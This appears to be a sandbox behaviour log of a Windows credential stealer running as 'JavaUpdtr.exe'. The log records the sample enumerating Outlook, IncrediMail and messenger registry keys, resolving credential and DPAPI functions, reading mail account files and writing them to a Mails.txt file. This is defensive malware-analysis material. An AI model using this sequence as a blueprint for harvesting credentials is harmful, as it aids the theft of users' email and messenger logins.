Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary, value_name = SMTP User, data = 103, type = REG_NONE False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook False 1
Fn
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\IncrediMail\Identities False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Group Mail False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\MessengerService False 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x74d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredReadA, address_out = 0x74d871c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredFree, address_out = 0x74d4b2ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredDeleteA, address_out = 0x74d87941 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateA, address_out = 0x74d87381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateW, address_out = 0x74d87481 True 1
Fn
Module Load module_name = crypt32.dll, base_address = 0x759b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptUnprotectData, address_out = 0x759e5a7f True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Yahoo\Pager False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL False 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x74d40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredReadA, address_out = 0x74d871c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredFree, address_out = 0x74d4b2ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredDeleteA, address_out = 0x74d87941 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateA, address_out = 0x74d87381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateW, address_out = 0x74d87481 True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount, type = size True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount, size = 1506, size_out = 1506 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount, type = size True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount, size = 670, size_out = 670 True 1
Fn
Data
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount, type = size True 1
Fn
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount, size = 1734, size_out = 1734 True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail False 1
Fn
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ True 1
Fn
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 50 True 1
Fn
Data
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 2 True 1
Fn
Data
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 29 True 1
Fn
Data
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 52 True 1
Fn
Data
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 40 True 1
Fn
Data
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 26 True 1
Fn
Data
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 22 True 1
Fn
Data
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 24 True 1
Fn
Data
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 26 True 1
Fn
Data
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 28 True 1
Fn
Data
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 22 True 1
Fn
Data
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 29 True 1
Fn
Data
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 22 True 1
Fn
Data
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 27 True 1
Fn
Data
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 22 True 1
Fn
Data
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 50 True 1
Fn
Data
File Write filename = C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt, size = 2 True 2
Fn
Data
Process #7: javaupdtr.exe
616 0
»
Information Value
ID #7
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:40, Reason: Autostart
Unmonitor End Time: 00:01:58, Reason: Self Terminated
Monitor Duration 00:00:18
OS Process Information
»
Information Value
PID 0x4e8
Parent PID 0x3a4 (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 4EC
0x 6DC
0x 6E4
0x 6F8
0x 6FC
0x 720
0x 724
0x 730
0x 734
Threads
Thread 0x4ec
615 0
»
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 2
Fn
Environment Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 1
Fn
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp, type = file_type True 2
Fn
File Write filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp\strpath.tmp, size = 64 True 1
Fn
Data
User Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Environment Get Environment String name = windir, result_out = C:\Windows True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
